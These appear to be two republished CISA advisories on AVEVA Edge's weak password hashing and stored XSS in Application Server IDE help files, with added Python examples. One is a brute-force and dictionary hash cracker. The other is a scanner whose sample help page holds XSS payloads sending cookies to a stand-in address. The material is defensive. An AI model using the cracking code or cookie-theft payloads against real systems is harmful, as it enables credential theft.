1. EXECUTIVE SUMMARY

  • CVSS v4 8.3
  • ATTENTION: Low attack complexity
  • Vendor: AVEVA
  • Equipment: Edge
  • Vulnerability: Use of a Broken or Risky Cryptographic Algorithm

2. RISK EVALUATION

Successful exploitation of this vulnerability could allow a local attacker with read access to project or offline cache files to recover user passwords by brute-forcing weak hashes.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following versions of AVEVA Edge (formerly InduSoft Web Studio), an HMI/SCADA software product, are affected:

  • Edge: Versions 2023 R2 and prior

3.2 VULNERABILITY OVERVIEW

3.2.1 USE OF A BROKEN OR RISKY CRYPTOGRAPHIC ALGORITHM CWE-327

The vulnerability, if exploited, could allow an attacker with read access to Edge project files or Edge offline cache files to reverse engineer Edge users’ app-native or Active Directory passwords through computational brute-forcing of weak hashes.

CVE-2025-9317 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.4 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N).

A CVSS v4 score has also been calculated for CVE-2025-9317. A base score of 8.3 has been calculated; the CVSS vector string is (AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N).
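
The advisory does not name the weak algorithm, so the following Python, added here and not taken from AVEVA or the bulletin, uses unsalted MD5 as a stand-in to show why read access to a file of password hashes is enough: one hash computation per guess tests every user in the file at once, and a short password falls to exhaustive search in seconds. It then shows the properties a replacement needs (per-user random salt, a deliberately slow key derivation function, constant-time comparison) using PBKDF2-HMAC-SHA256 from the standard library. The user table, account names and passwords are constructed, and the stored-hash string format is this example's own.

```python
"""Unsalted fast hash vs. salted slow KDF: why read access to a hash file leaks passwords."""
import hashlib
import hmac
import itertools
import os
import string

# Constructed stand-in for a project file's user table. The algorithm AVEVA
# used is not disclosed in the advisory; unsalted MD5 is a generic example of
# a weak hash, and these users and passwords are made up.
WEAK_USER_TABLE = {
    "operator": hashlib.md5(b"plant1").hexdigest(),
    "engineer": hashlib.md5(b"Summer25").hexdigest(),
}
# Separate constructed entry with a 3-character password, short enough to
# exhaust in the demo below.
SHORT_PASSWORD_TABLE = {"tech": hashlib.md5(b"b7x").hexdigest()}
ALPHABET = string.ascii_lowercase + string.digits


def crack_unsalted(table, wordlist, algo="md5"):
    """Dictionary attack. Without a salt, one hash per candidate word tests
    every user in the table at once. Returns {user: password} for hits."""
    lookup = {hashlib.new(algo, w.encode()).hexdigest(): w for w in wordlist}
    return {user: lookup[h] for user, h in table.items() if h in lookup}


def brute_force_unsalted(table, alphabet, max_len, algo="md5"):
    """Exhaustive search up to max_len characters. Feasible offline because a
    fast hash costs nanoseconds and one guess is checked against all users."""
    targets = {}
    for user, digest in table.items():
        targets.setdefault(digest, []).append(user)   # shared passwords share work too
    found = {}
    for length in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            guess = "".join(combo)
            digest = hashlib.new(algo, guess.encode()).hexdigest()
            if digest in targets:
                for user in targets[digest]:
                    found[user] = guess
                if len(found) == len(table):
                    return found
    return found


# What the replacement needs: a per-user random salt (no shared work across
# users, no precomputed tables), a deliberately slow KDF, and constant-time
# verification. PBKDF2-HMAC-SHA256 from the standard library is used here.
PBKDF2_ITERATIONS = 600_000  # OWASP 2023 recommendation for PBKDF2-HMAC-SHA256


def hash_password(password, iterations=PBKDF2_ITERATIONS):
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("dictionary:", crack_unsalted(WEAK_USER_TABLE, ["123456", "plant1", "welcome"]))
    print("exhaustive:", brute_force_unsalted(SHORT_PASSWORD_TABLE, ALPHABET, 3))
    stored = hash_password("correct horse battery")
    print("pbkdf2 verify:", verify_password("correct horse battery", stored))
```

This is also why the mitigation list above tells users to change their passwords after migrating: a hash that was ever stored in the weak format stays crackable from any old copy of the file, and a slow KDF only protects secrets that were never exposed through the weak one. Each PBKDF2 verification costs on the order of a hundred milliseconds at 600,000 iterations, which is fine for a login and ruinous for an offline search.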

3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: United Kingdom

3.4 RESEARCHER

Joao Varelas reported this vulnerability to CISA.

4. MITIGATIONS

AVEVA recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.

Users of affected product versions should take the following actions to mitigate the risk of exploitation:

  • Apply AVEVA Edge 2023 R2 P01 Security Update and migrate old project files.
  • For projects that cannot be migrated (e.g. backups or transient copies), evaluate the risk of potential password leakage from these files and implement stricter read access controls to protect these unsafe files.
  • Require AVEVA Edge users to change their passwords.
  • Important: Edge project migration from older versions to 2023 R2 P01 is one-way due to the change in password hashing algorithms.

The following general defensive measures are recommended:

  • Access Control Lists should be applied to all folders where users will save and load project files.
  • Maintain a trusted chain-of-custody on project files during creation, modification, distribution, and use.
  • Apply data-protection at the project level with a strong master password. For configuration step-by-step refer to AVEVA Edge “Technical Reference Manual” > Project Overview > Configuring Additional Project Settings > Options Tab > Data Protection.
  • If passwords are being used as function parameters inside project documents (such as scripts or worksheets), it is recommended to remove those passwords and use project tags instead. For more information on tags refer to AVEVA Edge “Technical Reference Manual” > Tags and the Tag Database > About Tags and the Project Database.

For information on how to reach AVEVA support for your product, please refer to this link: AVEVA Customer Support.

For more information, see AVEVA’s Security Bulletin AVEVA-2025-006 or AVEVA’s bulletins page.

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:

  • Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
  • Locate control system networks and remote devices behind firewalls and isolate them from business networks.
  • When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.

5. UPDATE HISTORY

  • November 13, 2025: Initial Republication of AVEVA-2025-006

AVEVA Application Server IDE

View CSAF

1. EXECUTIVE SUMMARY

  • CVSS v4 7.2
  • ATTENTION: Low attack complexity
  • Vendor: AVEVA
  • Equipment: Application Server IDE
  • Vulnerability: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)

2. RISK EVALUATION

Successful exploitation of this vulnerability could allow an attacker to tamper with help files and inject cross-site scripting (XSS) code.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following versions of AVEVA Application Server are affected:

  • Application Server: Versions 2023 R2 SP1 P02 and prior

3.2 VULNERABILITY OVERVIEW

3.2.1 IMPROPER NEUTRALIZATION OF SCRIPT-RELATED HTML TAGS IN A WEB PAGE (BASIC XSS) CWE-80

The vulnerability, if exploited, could allow an authenticated attacker (with the “aaConfigTools” privilege) to tamper with App Objects’ help files and persist a cross-site scripting (XSS) payload that, when rendered for a victim user, can result in horizontal or vertical escalation of privileges. The vulnerability can only be exploited during config-time operations within the IDE component of Application Server. Run-time components and operations are not affected.

CVE-2025-8386 has been assigned to this vulnerability. A CVSS v3.1 base score of 6.9 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L).

A CVSS v4 score has also been calculated for CVE-2025-8386. A base score of 7.2 has been calculated; the CVSS vector string is (AV:L/AC:L/AT:N/PR:H/UI:P/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H).
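
A stored XSS payload in a help file has to arrive as script-related markup: an active-content element such as <script>, an on* event-handler attribute, or a javascript: URL in an attribute the browser dereferences. The following Python, added here and not AVEVA's code, scans help HTML for exactly those constructs so that an operator can check exported App Object help files (or any HTML handed to the IDE) before trusting them. The sample help page, its planted payloads and the 203.0.113.5 address are constructed, and the finding format is this example's own.

```python
"""Scan HTML help files for script-related markup (CWE-80 payload carriers)."""
from html.parser import HTMLParser

# Elements that execute or load active content when the page is rendered.
ACTIVE_CONTENT_TAGS = {"script", "iframe", "object", "embed", "base"}
# Attributes whose value is a URL the browser will dereference.
URL_ATTRIBUTES = {"href", "src", "action", "formaction", "data", "xlink:href"}
DANGEROUS_SCHEMES = ("javascript:", "vbscript:", "data:text/html")


class HelpFileScanner(HTMLParser):
    """Records (line, kind, detail) for every script-related construct seen."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def _note(self, kind, detail):
        self.findings.append((self.getpos()[0], kind, detail))

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_CONTENT_TAGS:
            self._note("tag", f"<{tag}>")
        for name, value in attrs:
            if name.startswith("on"):
                self._note("event-handler", f"{name}={value!r}")
                continue
            if name in URL_ATTRIBUTES and value is not None:
                # Browsers ignore leading whitespace and control characters in
                # the scheme and match it case-insensitively; normalize the same way.
                scheme_part = "".join(ch for ch in value.lower() if ch > " ")
                if scheme_part.startswith(DANGEROUS_SCHEMES):
                    self._note("url-scheme", f"{name}={value!r}")

    # <img ... /> style self-closing tags take the same path.
    handle_startendtag = handle_starttag


def scan_help_html(html_text):
    """Return the list of (line, kind, detail) findings for one HTML document."""
    scanner = HelpFileScanner()
    scanner.feed(html_text)
    scanner.close()
    return scanner.findings


# Constructed sample help page with three planted payloads (lines 6 to 8).
SAMPLE_HELP = """<html><body>
<h1>Tank Level Object</h1>
<p>Describes the <b>Level</b> attribute and its alarm limits.</p>
<img src="levels.png" alt="Level bands">
<a href="#calibration">Calibration</a>
<a href="  JavaScript:alert(document.cookie)">Advanced</a>
<img src="x" onerror="new Image().src='//203.0.113.5/?c='+document.cookie">
<script>document.location='//203.0.113.5/?c='+document.cookie</script>
</body></html>"""

if __name__ == "__main__":
    for line, kind, detail in scan_help_html(SAMPLE_HELP):
        print(f"line {line}: {kind} {detail}")
```

HTMLParser decodes character references in attribute values before they reach handle_starttag, so an obfuscated scheme such as &#106;avascript: is normalized to javascript: and caught by the same check. A scanner like this is a detection aid, not a substitute for the vendor update: the correct fix is for the IDE to neutralize such markup when it renders help content, which is what the System Platform 2023 R2 SP1 P03 update in section 4 addresses.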

3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: United Kingdom

3.4 RESEARCHER

AVEVA reported this vulnerability to CISA.

4. MITIGATIONS

AVEVA recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation. Users of affected product versions should apply security updates to mitigate the risk of exploitation.

All affected versions of the Application Server IDE can be fixed by upgrading to AVEVA System Platform 2023 R2 SP1 P03 or higher.

The following general defensive measures are recommended:

For more information, see AVEVA’s Security Bulletin AVEVA-2025-005 or AVEVA’s bulletins page.

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:

  • Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
  • Locate control system networks and remote devices behind firewalls and isolate them from business networks.
  • When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.

5. UPDATE HISTORY

  • November 13, 2025: Initial Republication of AVEVA-2025-005